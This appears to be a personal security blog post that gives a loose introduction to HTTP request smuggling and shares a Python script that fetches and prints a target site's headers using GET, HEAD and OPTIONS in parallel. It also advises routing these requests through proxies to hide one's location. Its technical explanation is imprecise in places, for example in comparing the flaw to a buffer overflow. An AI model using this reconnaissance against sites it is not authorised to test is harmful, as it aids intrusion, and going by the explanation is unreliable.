HTTP and Request Smuggling

Hello All,
I recently stumbled upon an article that detailed an interesting exploit.  It is one that has been around for awhile and if accurately executed could have a disastrous impact on an organization.  Today we are talking about "Request Smuggling."

As I do when I begin traveling down the rabbit hole of security, I begin planning all kinds of cool fun scripts that could compliment the concept that I have been studying.  For this script today, this is no different.  However I had to scale back, I had a ton of features added that would make an interesting product.  In the end I decided to remove these add-ons and include in a separate package later.  In this script we are focusing on http headers only and obtaining the required information from them.

I hope that you did read the article, is was well done.  As a high level description, the passage of information between your machine and a the back end server hosting the site you are visiting may have multiple layers of servers between them.  This process is becoming more and more common as hosted environments are moved to cloud solutions.  Incorrect settings between front facing servers and back end servers may allow a person with malicious intent to package malware etc. on to additional http packets coming through.  Specifically we are looking for a relationship between Tranfser-Encoding and Content-Length.

These in themselves are normal and happen all the time. however if packaged together incorrectly a connection could potentially leave a server in a state where it would disregard the content length.  Which leaves us with a vulnerability very similar to a buffer over flow. Also justifying the name "Request Smuggling."  The attacker is smuggling his/her own code in with another HTTP request.

Below I have added my script that retrieves headers for target site.  Ideally this script would be used by an auditor(yourself) to analyze the headers that are present on your site.  The information gathered here is transferred between the host machine and the server every time someone visits the website.  There are actually tons of ways to analyze http headers.  My way here is not unique, however I have added additional features that make it interesting.

Extra features:
  • I intentionally make three separate requests to the site.  The purpose for this is that the script is primed for you to utilize proxies.  When you are scraping or accessing a site frequently to gather information, it is a good idea to obscure your location.  Also proxies assist in privacy.  You will see that I have a section for you to add proxies.  When you add your proxy change this line in each function
    • r = requests.get(var) ----->r = requests.get(var,proxy=proxies1) [modify appropriately for the function]
    • The vision was that you would use three different proxies.
  • Multiprocessing:  As soon as I added three separate requests it became immediately evident that multiprocessing was needed. You could use a proxy from Belarus and in the next function use a proxy from Mexico.  Your request would effectively be connecting to and hopping along large distances.  While we actually do this all the time while we hop along the internet it is nice for things to go a little faster.  For those familiar with interpreted languages you understand that the process is very linear.  Multiprocessing allows us to better utilize our host machines.
You can run the script from the terminal as follows:

python3 http_view.py https://mytargetsite.com

***Always be careful using free proxies online.  Nothing is free.  Free proxies are known to manipulate the traffic traveling through them.  I only use free proxies when I don't care that my traffic is being manipulated.  Why would I not care?  Well that is a discussion for another blog entry ;)

Enjoy!

import requests
import sys
from multiprocessing import Process
from bs4 import BeautifulSoup
import socket

var = sys.argv[1]

proxies1 = {
    
    'http': 'http://50.233.42.98:51696',
    'https':'http://50.233.42.98:51696'
}
proxies2 = {
    
    'http': 'http://50.233.42.98:51696',
    'https':'http://50.233.42.98:51696'
}
proxies3 = {
    
    'http': 'http://50.233.42.98:51696',
    'https':'http://50.233.42.98:51696'
}

print("utility to collect HTTP Headers!\n")

def r():
    print("\n\n")
    r = requests.get(var)#proxy=proxies1
    for key, value in r.headers.items():    
        print(key,"###",value)
    r.close()

def p():
    print("\n\n")
    p = requests.head(var)#proxy=proxies2
    print("#"*20)
    for key, value in p.headers.items():
        print(key,"##",value)
    p.close()

def o():
    o = requests.options(var)#proxy=proxies3
    print("\n\n")
    print("#"*20)
    for key, value in o.headers.items():
        print(key,"##",value)
    o.close()

myProcess1 = Process(target=r)
myProcess2 = Process(target=p)
myProcess3 = Process(target=o)


myProcess1.start()
myProcess2.start()
myProcess3.start()

Popular Posts